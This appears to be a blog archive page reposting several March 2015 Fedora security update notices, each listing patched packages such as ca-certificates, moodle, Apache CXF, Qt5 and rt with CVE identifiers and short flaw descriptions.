Monthly Archives: March 2015

Fedora

Fedora 22 Security Update: ca-certificates-2015.2.3-1.0.fc22

Leave a comment

Resolved Bugs
1205302 – Fix the legacy CA inclusions of upstream 2.1 and 2.2
1205305 – Update to version 2.3 as released with NSS 3.18<br
This is an update to the set of CA certificates released with NSS version 3.18
However, the package modifies the CA list to keep several legacy CAs still trusted for compatibility reasons. Please refer to the project URL for details.
If you prefer to use the unchanged list provided by Mozilla, and if you accept any compatibility issues it may cause, an administrator may configure the system by executing the “ca-legacy disable” command.
This update corrects the Fedora legacy classification of four root CA certificates, which had trust added or removed in the upstream 2.1 and 2.2 releases.

Fedora

Fedora 21 Security Update: moodle-2.7.7-1.fc21

Leave a comment

Resolved Bugs
1203203 – CVE-2015-2269 CVE-2015-2268 CVE-2015-2267 CVE-2015-2266 CVE-2015-2272 CVE-2015-2273 CVE-2015-2270 CVE-2015-2271 moodle: multiple flaws in moodle [fedora-all]
1203205 – CVE-2015-2269 CVE-2015-2268 CVE-2015-2267 CVE-2015-2266 CVE-2015-2272 CVE-2015-2273 CVE-2015-2270 CVE-2015-2271 moodle: multiple flaws in moodle [epel-6]
1190119 – CVE-2015-1493 moodle: Directory Traversal Attack possible through some files serving JS (MSA-15-0009) [fedora-all]<br
Update to latest versions of the respective branches. f20 has been updated from 2.5.x to 2.6.x because 2.5.x is EOL.

Fedora

Fedora 22 Security Update: opensaml-java-xmltooling-1.3.4-9.fc22,jboss-connector-1.6-api-1.0.1-1.fc22,cxf-xjc-utils-2.6.2-1.fc22,cxf-build-utils-2.6.0-1.fc22,cxf-2.7.11-1.fc22

Leave a comment

Resolved Bugs
1093529 – CVE-2014-0034 Apache CXF: The SecurityTokenService accepts certain invalid SAML Tokens as valid
1095534 – CVE-2014-0035 Apache CXF: UsernameTokens are sent in plaintext with a Symmetric EncryptBeforeSigning policy [fedora-all]
1095550 – CVE-2014-0110 Apache CXF: Large invalid content could cause temporary space to fill [fedora-all]
1106113 – cxf: FTBFS in rawhide
1095492 – CVE-2014-0034 Apache CXF: The SecurityTokenService accepts certain invalid SAML Tokens as valid [fedora-all]
1065245 – cxf: Upgrade to 2.7.11
1068021 – cxf: Switch to java-headless (build)requires
1095542 – CVE-2014-0109 Apache CXF: HTML content posted to SOAP endpoint could cause OOM errors [fedora-all]
1157305 – CVE-2014-3584 CVE-2014-3623 cxf: various flaws [fedora-all]<br
CXF upgrade to 2.7.11.

Fedora

Fedora 20 Security Update: mingw-qt5-qtbase-5.4.1-1.fc20,mingw-qt5-qtdeclarative-5.4.1-1.fc20,mingw-qt5-qtgraphicaleffects-5.4.1-1.fc20,mingw-qt5-qtimageformats-5.4.1-1.fc20,mingw-qt5-qtlocation-5.4.1-1.fc20,mingw-qt5-qtmultimedia-5.4.1-1.fc20,mingw-qt5-qtquick1-5.4.1-1.fc20,mingw-qt5-qtscript-5.4.1-1.fc20,mingw-qt5-qtsensors-5.4.1-1.fc20,mingw-qt5-qtsvg-5.4.1-1.fc20,mingw-qt5-qttools-5.4.1-1.fc20,mingw-qt5-qttranslations-5.4.1-1.fc20,mingw-qt5-qtwebkit-5.4.1-1.fc20,mingw-qt5-qtwinextras-5.4.1-1.fc20

Leave a comment

Resolved Bugs
1204798 – mingw-qt5-qtwebkit: qt5-qtwebkit: QtWebKit logs visited URLs to WebpageIcons.db in private browsing mode [fedora-all]<br
Update to Qt 5.4.1

Fedora

Fedora 22 Security Update: rt-4.2.10-2.fc22

Leave a comment

Resolved Bugs
1200059 – CVE-2014-9472 rt: denial of service flaw in email gateway
1200065 – CVE-2015-1165 rt: information disclosure flaw in RSS feed handler
1200066 – CVE-2015-1165 rt: information disclosure flaw in RSS feed handler [fedora-21]
1200062 – CVE-2014-9472 rt: denial of service flaw in email gateway [fedora-21]
1200069 – CVE-2015-1464 rt: session hijaking flaw in RSS feed handler
1200070 – CVE-2015-1464 rt: session hijaking flaw in RSS feed handler [fedora-21]<br
Security fix for CVE-2014-9472
Security fix for CVE-2015-1165
Security fix for CVE-2015-1464